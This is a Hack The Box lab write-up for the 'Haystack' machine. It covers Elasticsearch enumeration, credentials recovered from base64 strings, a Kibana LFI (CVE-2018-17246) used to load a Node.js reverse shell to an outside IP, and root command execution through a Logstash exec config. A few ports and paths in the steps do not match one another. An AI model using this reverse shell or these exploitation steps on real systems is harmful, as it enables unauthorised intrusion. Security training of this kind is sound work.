Hack The Box: Haystack

We start by running nmap, with the following options:

root@flagship:~# nmap -p- -T4 -oN notes -A 10.10.10.115

I always run it with -p-, which will scan all 65536 ports, rather than just the 1000 most common. And in this case, we see a few open ports:

PORT     STATE SERVICE REASON         VERSION                                                                                                                                                                      
22/tcp   open  ssh     syn-ack ttl 63 OpenSSH 7.4 (protocol 2.0)
80/tcp   open  http    syn-ack ttl 63 nginx 1.12.2
| http-methods:
|_  Supported Methods: GET HEAD
|_http-server-header: nginx/1.12.2
|_http-title: Site doesn't have a title (text/html).
9200/tcp open  http    syn-ack ttl 63 nginx 1.12.2
|_http-favicon: Unknown favicon MD5: 6177BFB75B498E0BB356223ED76FFE43
| http-methods:
|   Supported Methods: HEAD GET DELETE OPTIONS
|_  Potentially risky methods: DELETE
|_http-server-header: nginx/1.12.2
|_http-title: Site doesn't have a title (application/json; charset=UTF-8).

On port 80, it’s just a page with an image.

But since this is HTB, it’s worth having a quick look for any steganography. strings doesn’t reveal anything, but xxd does, at the very end of the file:

0002ca80: 8a00 28a2 8a00 28a2 8a00 28a2 8a00 28a2  ..(...(...(...(.
0002ca90: 8a00 28a2 8a00 ffd9 0a62 4745 6759 5764  ..(......bGEgYWd
0002caa0: 3161 6d45 675a 5734 675a 5777 6763 4746  1amEgZW4gZWwgcGF
0002cab0: 7159 5849 675a 584d 6749 6d4e 7359 585a  qYXIgZXMgImNsYXZ
0002cac0: 6c49 673d 3d0a                           lIg==.

That looks like base64, so let us decode that:

root@flagship:~# echo bGEgYWd1amEgZW4gZWwgcGFqYXIgZXMgImNsYXZlIg== | base64 -d
la aguja en el pajar es "clave"

Spanish for the needle in the page is “key” or perhaps literally, clave.

Since there doesn’t appear to be anything else to do with the image, let’s have a look at port 9200. If we access it, we get the following:

root@orbital:~# curl http://10.10.10.115:9200/
{
  "name" : "iQEYHgS",
  "cluster_name" : "elasticsearch",
  "cluster_uuid" : "pjrX7V_gSFmJY-DxP4tCQg",
  "version" : {
    "number" : "6.4.2",
    "build_flavor" : "default",
    "build_type" : "rpm",
    "build_hash" : "04711c2",
    "build_date" : "2018-09-26T13:34:09.098244Z",
    "build_snapshot" : false,
    "lucene_version" : "7.4.0",
    "minimum_wire_compatibility_version" : "5.6.0",
    "minimum_index_compatibility_version" : "5.0.0"
  },
  "tagline" : "You Know, for Search"
}

So we’re dealing with an ElasticSearch instance, version 6.4.2. If you aren’t familiar with it, this is a good starting point: ElasticSearch 101. However, the relevant part here is that URLs are expected to be in the format of http://10.10.10.115:9200/<index>/<type>/<id>, so we can try to find which indices are available with gobuster:

root@orbital:~# gobuster dir -u http://10.10.10.115:9200/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.115:9200/
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2019/09/07 21:21:02 Starting gobuster
===============================================================
/quotes (Status: 200)
/bank (Status: 200)

Knowing that the indices quotes and bank exist, we then need to find types which have indices. Gobuster won’t cut it for this, as we want to look for http://10.10.10.115:9200/quotes/<type>/1 and http://10.10.10.115:9200/bank/<type>/1, so we turn to wfuzz:

root@orbital:~# wfuzz -u http://10.10.10.115:9200/quotes/FUZZ/1 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hc 404

********************************************************
* Wfuzz 2.3.4 - The Web Fuzzer                         *
********************************************************

Target: http://10.10.10.115:9200/quotes/FUZZ/1
Total requests: 220560

==================================================================
ID   Response   Lines      Word         Chars          Payload
==================================================================
000826:  C=200      0 L       63 W          462 Ch        "quote"

And then we repeat the same for bank:

root@orbital:~# wfuzz -u http://10.10.10.115:9200/bank/FUZZ/1 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hc 404

********************************************************
* Wfuzz 2.3.4 - The Web Fuzzer                         *
********************************************************

Target: http://10.10.10.115:9200/bank/FUZZ/1
Total requests: 220560

==================================================================
ID   Response   Lines      Word         Chars          Payload
==================================================================

000349:  C=200      0 L        3 W          286 Ch        "account"

Now that we know two types, we just have to identify what valid ids there are. Again, wfuzz can do this by using a range iterator:

root@orbital:~# wfuzz -u http://10.10.10.115:9200/bank/account/FUZZ -z range,1-2000 --hc 404
root@orbital:~# wfuzz -u http://10.10.10.115:9200/quotes/quote/FUZZ -z range,1-2000 --hc 404

This will show us that there are 999 valid ids – which we can then download using our trusty curl for further analysis.

root@flagship:~# curl "http://10.10.10.115:9200/bank/accounts/[1-999]" -o "accounts/#1"
root@flagship:~# curl "http://10.10.10.115:9200/quotes/quote/[1-999]" -o "quotes/#1"

I didn’t find any useful information in the nearly 2000 files when blindly searching for credentials, but using what we’ve got from the image we get the following:

root@flagship:~# grep -r clave *
quotes/45.html:{"_index":"quotes","_type":"quote","_id":"45","_version":1,"found":true,"_source":{"quote":"Tengo que guardar la clave para la maquina: dXNlcjogc2VjdXJpdHkg "}}
quotes/111.html:{"_index":"quotes","_type":"quote","_id":"111","_version":1,"found":true,"_source":{"quote":"Esta clave no se puede perder, la guardo aca: cGFzczogc3BhbmlzaC5pcy5rZXk="}}

With some more base64-looking strings, we decode them as before:

root@flagship:~# echo dXNlcjogc2VjdXJpdHkg | base64 -d
user: security 
root@flagship:~# echo cGFzczogc3BhbmlzaC5pcy5rZXk= | base64 -d
pass: spanish.is.key

With these credentials, we can login via SSH and grab the user flag.

root@flagship:~# ssh security@10.10.10.115
security@10.10.10.115's password: 
[security@haystack ~]$ ls
user.txt

Now that we have a foothold, the next step is to run Linux Smart Enumeration and see if that gives us anything interesting to go on. Thankfully, since we already have SSH access, we can just copy it over with scp rather anything more elaborate.

From a cursory look at the results from LSE, we can see this server is running an ELK stack (ElasticSearch, Logstash, Kibana), with matching user accounts. Additionally, Logstash is running as root and is a likely escalation point.

It also looks like the following ports can be accessed internally: 5601 (Kibana), 9000 and 9300 (both ElasticSearch). 5601 is particularly interesting as it wasn’t available remotely.

Since we know we’re running ElasticSearch 6.4.2, it’s worth checking if there are any issues we can leverage. Looking for vulnerabilities the very first one seems relevant: CVE-2018-17246 (detailed explanation here).

It looks like we might get an LFI using this, which would then let us gain access to the kibana user. We can get a viable node reverse shell from here:

(function(){
    var net = require("net"),
        cp = require("child_process"),
        sh = cp.spawn("/bin/sh", []);
    var client = new net.Socket();
    client.connect(8080, "192.168.33.1", function(){
        client.pipe(sh.stdin);
        sh.stdout.pipe(client);
        sh.stderr.pipe(client);
    });
    return /a/; // Prevents the Node.js application form crashing
})();

We copy this to haystack (in my case, I copied it to /tmp) and call the vulnerable endpoint:

[security@haystack tmp]$ curl 127.0.0.1:5601/api/console/api_server?apis=../../../../../../../../../../tmp/hn1.js  

An on our attacking machine we get a callback:

root@flagship:~/shared.node/htb# nc -lvp 1337
listening on [any] 1337 ...
10.10.10.115: inverse host lookup failed: Unknown host
connect to [10.10.16.40] from (UNKNOWN) [10.10.10.115] 52436
whoami
kibana

And then we upgrade our shell into something a bit more usable:

python -c 'import pty; pty.spawn("/bin/bash")'  
bash-4.2$

We know that logstash runs as root, so that is probably our way in. The normal flow for a simple ELK stack is that data from ElasticSearch gets processed by LogStash and then presented by Kibana, and we can find that step in /etc/logstash/conf.d. The folder is only accessible now that we are logged in as the kibana user. However, although the files can be read, they can’t be modified.

input.conf

input {
         file {
                 path => "/opt/kibana/logstash_*"
                 start_position => "beginning"
                 sincedb_path => "/dev/null"
                 stat_interval => "10 second"
                 type => "execute"
                 mode => "read"
         }
 }

filter.conf

filter {
        if [type] == "execute" {
                grok {
                        match => { "message" => "Ejecutar\s*comando\s*:\s+%{GREEDYDATA:comando}" }
                }
        }
}

output.conf

output {
        if [type] == "execute" {
                stdout { codec => json }
                exec {
                        command => "%{comando} &"
                }
        }
}

From reading these files, we can see that it takes input files in the folder /opt/kibana/, with the filename having to start with logstash_. The contents of the file have to be Ejecutar comando : followed by the command we want to execute.

Since we know what we want to get out is the root flag, we can do the following:

bash-4.2$ echo Ejecutar comando : cp /root/root.txt /tmp/root.txt > /tmp/logstash_root
bash-4.2$ echo Ejecutar comando : chmod 777 /tmp/root.txt > logstash_root2

And within ten seconds our commands will get executed:

bash-4.2$ wc -c /tmp/root.txt<br>
wc -c /tmp/root.txt<br>
33 /tmp/root.txt
Work in progress
To top